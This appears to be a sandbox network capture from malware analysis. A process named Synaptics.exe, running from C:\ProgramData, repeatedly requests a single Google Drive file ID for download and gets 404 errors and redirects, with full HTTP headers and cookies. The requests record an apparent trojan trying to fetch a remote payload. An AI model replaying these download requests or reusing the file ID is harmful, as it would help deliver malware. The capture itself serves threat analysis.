                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            5 | 192.168.2.8 | 49725 | 142.250.185.161 | 443 | 8060 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:48:56 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            2024-12-30 10:48:57 UTC | 1594 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC5CyZ8Ry0hRBMoQaKvjOLo-7dUnQ_6dON501F1RA2_qGz0yrgzbqh7k-I2fn4bIjLjb
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:48:57 GMT
                                                                                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-cLrC06TI7cTFmOMkCSw2tQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Set-Cookie: NID=520=O4iN5IOxf23kqpAqHJs_aF9KIEkavC4db8fvXtDOSh40Q7kbxnzU6nDxPE49KGn1Upx72cmG3NN0GTohw-johdvyQbL7l4JR3HuoUWf78GMDSGQhK9RxBNzIFRGHLMS8IY2iUnYPlfCloDF0QRl1r5wU1FU7L_3McvXp_ga72fpAgxvnLRCVeF0; expires=Tue, 01-Jul-2025 10:48:57 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:48:57 UTC | 1594 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="lQK_paD12sJouNFIyXnf-g">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                                                            2024-12-30 10:48:57 UTC | 58 | IN | Data Ascii: nd on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            6 | 192.168.2.8 | 49724 | 142.250.185.161 | 443 | 8060 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:48:56 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
2024-12-30 10:48:57 UTC | 1594 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC7H7WZEZC07BeG3AqwYLyv60wXpmpOrKsIFfFQqoHc4bY4Nymd1oFVU541EBay93MIr
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:48:57 GMT
                                                                                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-TinI2UiaYXj7SQbaaPqalQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Set-Cookie: NID=520=VC9Az_mxJ6FjsLomJdQOpKgQ4a1FhUiWGrzaZIMrw8k6urzaBLn7gtF1ACWlSJ8unr8PDR5SNcOe093vYylGPwpZvusWE7hocDA-7-p5uk-Flsh3bUQs_rlUzgEjafxKOB_oLSUQknDeVd8xqaAFKac_Rpc5-jpZSSFqffNXjgy_zxzFCv8KJUM; expires=Tue, 01-Jul-2025 10:48:57 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:48:57 UTC | 1594 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KlwvB4Xz1_9vYsCyNidPtw">*{margin:0;padding:0}html,code{font:15px/22px arial
2024-12-30 10:48:57 UTC | 58 | IN | Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49729 | 142.250.185.78 | 443 | 8060 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:57 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
2024-12-30 10:48:58 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:48:58 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-qvgvp2njoYf38IxshvPlpw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.8 | 49731 | 142.250.185.161 | 443 | 8060 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:57 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
2024-12-30 10:48:58 UTC | 1594 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC6iVXEp_BdGD8ayuHQebqLBYBGR6eoKetdqtcaKLn1RLrIB_ToziZx1YIZCCXjsdCJ3
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:48:58 GMT
                                                                                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-gZXcQIPd7C_z1zFawLmRBQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Set-Cookie: NID=520=SrDjQsTi5aM3Y2MbUchHVvWZIqrlHKgIL685g4nhgEV4rJx4kjebBUMbDUxhRXpVu4_DMcHX3f-COVQnUJMe8p-5cN8H9skaZZTE_clRgqz-O9PdMlTZlbsmQzNT6xZryPDm-t1KC-oftlTjqjODq9KNhxmczYU_-fWhdxvUdtzEfL5peodoJq8; expires=Tue, 01-Jul-2025 10:48:58 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:48:58 UTC | 1594 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="azwfQEPpAL3SsBi9CJYZaw">*{margin:0;padding:0}html,code{font:15px/22px arial
2024-12-30 10:48:58 UTC | 58 | IN | Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.8 | 49730 | 142.250.185.78 | 443 | 8060 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:57 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
2024-12-30 10:48:58 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:48:58 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-fFDmXlrjWdH3txD748gpUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.8 | 49733 | 142.250.185.161 | 443 | 8060 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:58 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
2024-12-30 10:48:58 UTC | 1601 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC4pcGMXXu-uzf0A7AG1l2TkE6Jd3IlVD0YXR4t-ucZ5SqrEEZ1k-cPgFRjjsTceQV6bGr6iFyA
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:48:58 GMT
                                                                                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-GP7RymNJYgkViWAzmghQ7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Set-Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM; expires=Tue, 01-Jul-2025 10:48:58 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:48:58 UTC | 1601 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Kr7muq2wZTqj94zTB9jHzg">*{margin:0;padding:0}html,code{font:15px/22px arial
2024-12-30 10:48:58 UTC | 51 | IN | Data Ascii: his server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.8 | 49734 | 142.250.185.78 | 443 | 8060 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:58 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
2024-12-30 10:48:59 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:48:59 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-0aP1peOZ4f9vToTnNyYnoA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.8 | 49735 | 142.250.185.78 | 443 | 8060 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:58 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
2024-12-30 10:48:59 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:48:59 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-r_YljptOBgLR2haYoxAMkw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.8 | 49736 | 142.250.185.161 | 443 | 8060 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:58 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=VC9Az_mxJ6FjsLomJdQOpKgQ4a1FhUiWGrzaZIMrw8k6urzaBLn7gtF1ACWlSJ8unr8PDR5SNcOe093vYylGPwpZvusWE7hocDA-7-p5uk-Flsh3bUQs_rlUzgEjafxKOB_oLSUQknDeVd8xqaAFKac_Rpc5-jpZSSFqffNXjgy_zxzFCv8KJUM
2024-12-30 10:48:59 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC7xTkcSGTIYxMIdbHF8zE-CfhqmKlvyH9oRJfLkvNZGodKGHaSBO6-4rgr_YuY42A96V3g3WmQ
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:48:59 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-xI9fW_5nQzH5VtB4tO5KvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:48:59 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:48:59 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="2Osoipvh-Gu_zntb3a3vLA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:48:59 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.8 | 49738 | 142.250.185.161 | 443 | 8060 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:59 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=VC9Az_mxJ6FjsLomJdQOpKgQ4a1FhUiWGrzaZIMrw8k6urzaBLn7gtF1ACWlSJ8unr8PDR5SNcOe093vYylGPwpZvusWE7hocDA-7-p5uk-Flsh3bUQs_rlUzgEjafxKOB_oLSUQknDeVd8xqaAFKac_Rpc5-jpZSSFqffNXjgy_zxzFCv8KJUM


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.8 | 49743 | 142.250.185.161 | 443 | 8060 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:07 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
